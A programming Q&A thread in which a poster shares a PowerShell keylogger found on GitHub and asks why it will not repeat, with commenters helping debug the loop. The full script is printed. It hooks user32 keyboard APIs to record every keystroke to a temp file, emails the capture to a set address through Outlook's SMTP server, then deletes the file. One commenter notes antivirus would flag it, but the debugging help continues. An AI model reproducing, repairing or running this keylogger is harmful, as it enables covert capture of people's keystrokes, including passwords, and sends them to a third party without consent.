# Why won't this script run multiple times in a row?

Tags: powershell, powershell-2.0, powershell-3.0

I am new to Powershell and have just been experimenting with it so far to learn how it works. Recently I found a cool keylogger script on github that I decided to check out. It’s all working except for the amount of times it should repeat (`$TimesToRun`).

I have spend most of my day today trying to figure out what the problem was and fixing it but with no luck so far.

I also tried rewrite the script. One thing I tried is looping the script in various ways: [ `for ($i=1; $i -le 5; $i++)` etc…] but it still wouldn’t work. It just closes after the first time period or a new .txt file isn’t created so I get a error. Here is the script, maybe someone can help me find the problem:

```
# Edit only this section!
$TimesToRun = 2
$RunTimeP = 1
$From = "USER1@mail.com"
$To = "USER2@mail.com"
$Subject = "Keylogger Results"
$body = "Keylogger Results"
$SMTPServer = "smtp.outlook.com"
$SMTPPort = "587"
$credentials = Get-Credential
############################


$TimeStart = Get-Date
$TimeEnd = $timeStart.addminutes($RunTimeP)

#requires -Version 2
function Start-KeyLogger($Path="$env:temp\keylogger.txt") 
{
  # Signatures for API Calls
  $signatures = @'
[DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] 
public static extern short GetAsyncKeyState(int virtualKeyCode); 
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int GetKeyboardState(byte[] keystate);
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int MapVirtualKey(uint uCode, int uMapType);
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
'@

  # load signatures and make members available
  $API = Add-Type -MemberDefinition $signatures -Name 'Win32' -Namespace API -PassThru

  # create output file
  $null = New-Item -Path $Path -ItemType File -Force

  try
  {

    # create endless loop. When user presses CTRL+C, finally-block
    # executes and shows the collected key presses
    $Runner = 0
    while ($TimesToRun  -ge $Runner) {
    while ($TimeEnd -ge $TimeNow) {
      Start-Sleep -Milliseconds 40

      # scan all ASCII codes above 8
      for ($ascii = 9; $ascii -le 254; $ascii++) {
        # get current key state
        $state = $API::GetAsyncKeyState($ascii)

        # is key pressed?
        if ($state -eq -32767) {
          $null = [console]::CapsLock

          # translate scan code to real code
          $virtualKey = $API::MapVirtualKey($ascii, 3)

          # get keyboard state for virtual keys
          $kbstate = New-Object Byte[] 256
          $checkkbstate = $API::GetKeyboardState($kbstate)

          # prepare a StringBuilder to receive input key
          $mychar = New-Object -TypeName System.Text.StringBuilder

          # translate virtual key
          $success = $API::ToUnicode($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0)

          if ($success) 
          {
            # add key to logger file
            [System.IO.File]::AppendAllText($Path, $mychar, [System.Text.Encoding]::Unicode) 
          }
        }
      }
      $TimeNow = Get-Date
    }
    send-mailmessage -from $from -to $to -subject $Subject -body $body -Attachment $Path -smtpServer $smtpServer -port $SMTPPort -credential $credentials -usessl
    Remove-Item -Path $Path -force
    }
  }
  finally
  {
    # open logger file in Notepad
    exit 1
  }
}

# records all key presses until script is aborted by pressing CTRL+C
# will then open the file with collected key codes
Start-KeyLogger
```

Comment: Well the problem is obviously in your while loop if it isnt running endlessly, assuming no errors are thrown when its done, try setting your while loops to `while($true)` this should have them run infinitely, if it works then your problem lies within your comparison inside the `while` loop

Comment: You have `while ($TimeEnd -ge $TimeNow)` at a point where `$TimeNow` has not been defined. You do that only at the end of the loop. For starters, remove the `$TimeNow` as a whole and check `while ($TimeEnd -ge (Get-Date))`. P.S. Any AV software will jump on this sort of script. Why do you want to do this?

Comment: @Theo I'm trying other peoples script just to get an idea for what it is possible and thought it was cool that you could register keystrokes with just powershell. When I run into problems I tend to try to fix them as a way of learning how codes work.

Your solotuion sounds promising so I did just that. I removed the "exit 1" part of the script to see how it would run and after the first minute it said that no keylogger.txt file was found. So I assumed that the first part of the try-loop should start before the text file is created. I did that but then the scrip wouln't end at all.

Comment: @KevinHernandez, yes the problem is most likely inside the `while` loop, your  `while($true)` tip confirmed this. I tried @Theo 's solution but that did not work as planned as you can see from my previous comment. I am trying to work on a solution right now. Do you have any idea of what I could do?

Comment: @ChrisSolo You said it runs but the script doesnt end at all, when do you want the script to end then?

Comment: @KevinHernandez I want it to run for x minutes, z times in a row. So in this case I have written the script to run for 1 minute, 2 times in a row. What should happend is after one minute I can see what keys have been pressed, and after another minute I can see what new keys have been pressed; all while running the script just once. 

With the `while($true)` the script doesn't end at all so I don't get a mail for what keys have been pressed.